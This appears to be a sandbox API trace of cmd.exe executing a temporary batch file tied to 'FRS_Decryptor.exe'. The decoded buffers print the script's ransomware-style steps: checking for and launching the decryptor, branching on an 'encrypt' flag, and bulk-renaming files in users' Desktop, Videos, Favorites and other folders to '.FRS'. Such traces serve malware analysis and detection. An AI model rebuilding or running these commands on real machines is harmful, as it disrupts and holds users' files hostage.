(in: hFile=0x2b8, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0140.571] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0140.571] GetFileType (hFile=0x2b8) returned 0x1 [0140.571] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0140.571] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0140.571] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0140.571] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0140.571] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0140.571] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0140.571] GetFileType (hFile=0x2b8) returned 0x1 [0140.571] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0140.571] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0140.571] _tell (_FileHandle=3) returned 2627 [0140.571] _close (_FileHandle=3) returned 0 [0140.572] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0140.572] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0140.572] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0140.572] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0140.572] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0140.576] feof (_File=0x76ea4c68) returned 0 [0140.576] ferror (_File=0x76ea4c68) returned 0 [0140.576] fgets (in: _Buf=0xd81598, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0141.070] feof (_File=0x76ea4c68) returned 0 [0141.070] ferror (_File=0x76ea4c68) returned 0 [0141.070] fgets (in: _Buf=0xd865c6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0141.107] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0141.107] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43886, cbMultiByte=78, lpWideCharStr=0xd43838, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0141.108] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0141.108] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0141.108] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0141.108] _open_osfhandle (_OSFileHandle=0x2e8, _Flags=8) returned 3 [0141.108] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.108] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0141.108] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.108] GetFileSize (in: hFile=0x2e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0141.108] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0141.108] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.108] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0141.108] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.108] GetFileType (hFile=0x2e8) returned 0x1 [0141.108] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0141.109] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0141.109] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0141.109] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.109] GetFileType (hFile=0x2e8) returned 0x1 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0141.109] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0141.109] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0141.109] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.109] GetFileType (hFile=0x2e8) returned 0x1 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0141.109] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.109] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.109] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.109] GetFileType (hFile=0x2e8) returned 0x1 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.109] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0141.109] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0141.109] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.109] GetFileType (hFile=0x2e8) returned 0x1 [0141.109] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0141.110] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0141.110] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0141.110] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.110] GetFileType (hFile=0x2e8) returned 0x1 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0141.110] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0141.110] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0141.110] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.110] GetFileType (hFile=0x2e8) returned 0x1 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0141.110] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0141.110] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0141.110] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.110] GetFileType (hFile=0x2e8) returned 0x1 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0141.110] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0141.110] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0141.110] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.110] GetFileType (hFile=0x2e8) returned 0x1 [0141.110] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0141.111] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0141.111] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0141.111] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.111] GetFileType (hFile=0x2e8) returned 0x1 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0141.111] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0141.111] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0141.111] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.111] GetFileType (hFile=0x2e8) returned 0x1 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0141.111] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0141.111] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0141.111] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.111] GetFileType (hFile=0x2e8) returned 0x1 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0141.111] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0141.111] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0141.111] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0141.111] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.112] GetFileType (hFile=0x2e8) returned 0x1 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0141.112] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0141.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0141.112] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.112] GetFileType (hFile=0x2e8) returned 0x1 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0141.112] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=196, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0141.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=47, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" *.*.FRS\r\n\\temp.txt\"')do set n=%%i\r\n") returned 47 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0141.112] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.112] GetFileType (hFile=0x2e8) returned 0x1 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4 [0141.112] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=247, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0141.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Saved Games\\*.*\" *.*.FRS\r\np.txt\"')do set n=%%i\r\n") returned 51 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0141.112] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.112] GetFileType (hFile=0x2e8) returned 0x1 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf7 [0141.112] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=292, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0141.112] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=45, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Links\\*.*\" *.*.FRS\r\n.FRS\r\n") returned 45 [0141.112] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0141.113] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.113] GetFileType (hFile=0x2e8) returned 0x1 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x124 [0141.113] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=341, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0141.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=49, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Favorites\\*.*\" *.*.FRS\r\n\r\n") returned 49 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0141.113] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.113] GetFileType (hFile=0x2e8) returned 0x1 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x155 [0141.113] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=389, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0141.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=48, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Searches\\*.*\" *.*.FRS\r\n\n") returned 48 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0141.113] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.113] GetFileType (hFile=0x2e8) returned 0x1 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x185 [0141.113] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=435, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0141.113] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=46, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ren \"C:\\Users\\%USERNAME%\\Videos\\*.*\" *.*.FRS\r\n\r\n") returned 46 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0141.113] _get_osfhandle (_FileHandle=3) returned 0x2e8 [0141.113] GetFileType (hFile=0x2e8) returned 0x1 [0141.113] SetFilePointer (in: hFile=0x2e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1b3 [0141.113] ReadFile (in: hFile=0x2e8, lpBuffer=0x12b6840, 